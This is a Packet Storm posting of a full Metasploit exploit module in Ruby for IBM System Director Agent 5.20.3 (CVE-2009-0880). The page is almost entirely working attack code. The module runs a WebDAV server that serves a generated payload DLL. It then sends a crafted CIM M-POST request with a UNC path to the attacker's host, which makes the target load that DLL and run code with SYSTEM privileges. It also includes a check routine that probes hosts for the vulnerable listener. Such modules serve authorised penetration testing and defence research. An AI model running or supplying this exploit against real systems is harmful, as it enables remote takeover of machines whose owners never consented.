Lucene search

K
packetstormKingcopePACKETSTORM:118669
HistoryDec 07, 2012 - 12:00 a.m.

IBM System Director Agent DLL Injection

2012-12-0700:00:00
Kingcope
packetstormsecurity.com
37

EPSS

0.405

Percentile

97.3%

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HttpServer::HTML  
include Msf::Exploit::EXE  
  
def initialize  
super(  
'Name' => 'IBM System Director Agent DLL Injection',  
'Description' => %q{  
This module abuses the "wmicimsv" service on IBM System Director Agent 5.20.3  
to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM  
privileges.  
  
In order to accomplish remote DLL injection it uses a WebDAV service as disclosed  
by kingcope on December 2012. Because of this, the target host must have the  
WebClient service (WebDAV Mini-Redirector) enabled. It is enabled and automatically  
started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.  
},  
'Author' => [  
'Bernhard Mueller', # Vulnerability discovery and exploit using directory traversal  
'kingcope', # Exploit using WebDAV  
'juan vazquez' # Metasploit module  
],  
'Platform' => 'win',  
'References' =>  
[  
[ 'CVE', '2009-0880'],  
[ 'OSVDB', '52616'],  
[ 'OSVDB', '88102'],  
[ 'BID', '34065' ],  
[ 'URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt' ],  
[ 'URL', 'http://seclists.org/bugtraq/2012/Dec/5' ]  
],  
'Targets' =>  
[  
[ 'IBM System Director Agent 5.20.3 / Windows with WebClient enabled', { } ]  
],  
'DefaultTarget' => 0,  
'Privileged' => true,  
'DisclosureDate' => 'Mar 10 2009'  
)  
register_options(  
[  
Opt::RPORT(6988),  
OptString.new('URIPATH', [ true, "The URI to use (do not change)", "/" ]),  
OptPort.new('SRVPORT', [ true, "The daemon port to listen on (do not change)", 80 ])  
], self.class)  
end  
  
def auto_target(cli, request)  
agent = request.headers['User-Agent']  
  
ret = nil  
# Check for MSIE and/or WebDAV redirector requests  
if agent =~ /(Windows NT 5\.1|MiniRedir\/5\.1)/  
ret = targets[0]  
elsif agent =~ /(Windows NT 5\.2|MiniRedir\/5\.2)/  
ret = targets[0]  
else  
print_error("Unknown User-Agent: #{agent}")  
end  
  
ret  
end  
  
  
def on_request_uri(cli, request)  
  
mytarget = target  
if target.name == 'Automatic'  
mytarget = auto_target(cli, request)  
if (not mytarget)  
send_not_found(cli)  
return  
end  
end  
  
# If there is no subdirectory in the request, we need to redirect.  
if (request.uri == '/') or not (request.uri =~ /\/[^\/]+\//)  
if (request.uri == '/')  
subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'  
else  
subdir = request.uri + '/'  
end  
print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")  
send_redirect(cli, subdir)  
return  
end  
  
# dispatch WebDAV requests based on method first  
case request.method  
when 'OPTIONS'  
process_options(cli, request, mytarget)  
  
when 'PROPFIND'  
process_propfind(cli, request, mytarget)  
  
when 'GET'  
process_get(cli, request, mytarget)  
  
when 'PUT'  
print_status("Sending 404 for PUT #{request.uri} ...")  
send_not_found(cli)  
  
else  
print_error("Unexpected request method encountered: #{request.method}")  
  
end  
  
end  
  
  
#  
# GET requests  
#  
def process_get(cli, request, target)  
  
print_status("Responding to GET request #{request.uri}")  
# dispatch based on extension  
if (request.uri =~ /\.dll$/i)  
print_status("Sending DLL")  
return if ((p = regenerate_payload(cli)) == nil)  
dll_payload = generate_payload_dll  
send_response(cli, dll_payload, { 'Content-Type' => 'application/octet-stream' })  
else  
send_not_found(cli)  
end  
end  
  
  
#  
# OPTIONS requests sent by the WebDav Mini-Redirector  
#  
def process_options(cli, request, target)  
print_status("Responding to WebDAV OPTIONS request")  
headers = {  
#'DASL' => '<DAV:sql>',  
#'DAV' => '1, 2',  
'Allow' => 'OPTIONS, GET, PROPFIND',  
'Public' => 'OPTIONS, GET, PROPFIND'  
}  
send_response(cli, '', headers)  
end  
  
  
#  
# PROPFIND requests sent by the WebDav Mini-Redirector  
#  
def process_propfind(cli, request, target)  
path = request.uri  
print_status("Received WebDAV PROPFIND request")  
body = ''  
  
if (path =~ /\.dll$/i)  
print_status("Sending DLL multistatus for #{path} ...")  
body = %Q|<?xml version="1.0"?>  
<a:multistatus xmlns:b="urn:uuid:c2f41010-65b3-11d1-a29f-00aa00c14882/" xmlns:c="xml:" xmlns:a="DAV:">  
<a:response>  
</a:response>  
</a:multistatus>  
|  
elsif (path =~ /\.manifest$/i) or (path =~ /\.config$/i) or (path =~ /\.exe/i) or (path =~ /\.dll/i)  
print_status("Sending 404 for #{path} ...")  
send_not_found(cli)  
return  
  
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))  
# Response for anything else (generally just /)  
print_status("Sending directory multistatus for #{path} ...")  
body = %Q|<?xml version="1.0" encoding="utf-8"?>  
<D:multistatus xmlns:D="DAV:">  
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">  
<D:href>#{path}</D:href>  
<D:propstat>  
<D:prop>  
<lp1:resourcetype><D:collection/></lp1:resourcetype>  
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>  
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>  
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>  
<D:lockdiscovery/>  
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>  
</D:prop>  
<D:status>HTTP/1.1 200 OK</D:status>  
</D:propstat>  
</D:response>  
</D:multistatus>  
|  
  
else  
print_status("Sending 404 for #{path} ...")  
send_not_found(cli)  
return  
  
end  
  
# send the response  
resp = create_response(207, "Multi-Status")  
resp.body = body  
resp['Content-Type'] = 'text/xml'  
cli.send_response(resp)  
end  
  
def xml_data  
xml = <<-eos  
<?xml version="1.0" encoding="utf-8" ?>  
<CIM CIMVERSION="2.0" DTDVERSION="2.0">  
<MESSAGE ID="1007" PROTOCOLVERSION="1.0">  
<SIMPLEEXPREQ>  
<EXPMETHODCALL NAME="ExportIndication">  
<EXPPARAMVALUE NAME="NewIndication">  
<INSTANCE CLASSNAME="CIM_AlertIndication" >  
<PROPERTY NAME="Description" TYPE="string">  
<VALUE>Sample CIM_AlertIndication indication</VALUE>  
</PROPERTY>  
<PROPERTY NAME="AlertType" TYPE="uint16">  
<VALUE>1</VALUE>  
</PROPERTY>  
<PROPERTY NAME="PerceivedSeverity" TYPE="uint16">  
<VALUE>3</VALUE>  
</PROPERTY>  
<PROPERTY NAME="ProbableCause" TYPE="uint16">  
<VALUE>2</VALUE>  
</PROPERTY>  
<PROPERTY NAME="IndicationTime" TYPE="datetime">  
<VALUE>20010515104354.000000:000</VALUE>  
</PROPERTY>  
</INSTANCE>  
</EXPPARAMVALUE>  
</EXPMETHODCALL>  
</SIMPLEEXPREQ>  
</MESSAGE>  
</CIM>  
eos  
return xml  
end  
  
def check  
  
peer = "#{rhost}:#{rport}"  
print_status("#{peer} - Checking if CIMListener exists...")  
  
res = send_request_cgi({  
'uri' => "/CIMListener/",  
'method' => 'M-POST',  
'ctype' => 'application/xml; charset=utf-8',  
'headers' => {  
"Man" => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40",  
"CIMOperation" => "MethodCall",  
"CIMExport" => "MethodRequest",  
"CIMExportMethod" => "ExportIndication"  
},  
'data' => xml_data,  
}, 1)  
  
if res and res.code == 200 and res.body =~ /CIMVERSION/  
return CheckCode::Appears  
end  
return CheckCode::Safe  
end  
  
def exploit  
  
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'  
fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')  
end  
  
super  
  
end  
  
def primer  
  
basename = rand_text_alpha(3)  
share_name = rand_text_alpha(3)  
myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']  
exploit_unc = "\\\\#{myhost}\\"  
  
vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")  
  
@peer = "#{rhost}:#{rport}"  
  
print_status("#{@peer} - Injecting DLL...")  
  
res = send_request_cgi({  
'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll",  
'method' => 'M-POST',  
'ctype' => 'application/xml; charset=utf-8',  
'headers' => {  
"Man" => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40",  
"CIMOperation" => "MethodCall",  
"CIMExport" => "MethodRequest",  
"CIMExportMethod" => "ExportIndication"  
},  
'data' => xml_data,  
})  
  
if res and res.code == 200 and res.body =~ /CIMVERSION/  
print_status"#{@peer} - Then injection seemed to work..."  
else  
fail_with(Exploit::Failure::Unknown, "#{@peer} - Unexpected response")  
end  
end  
  
end  
`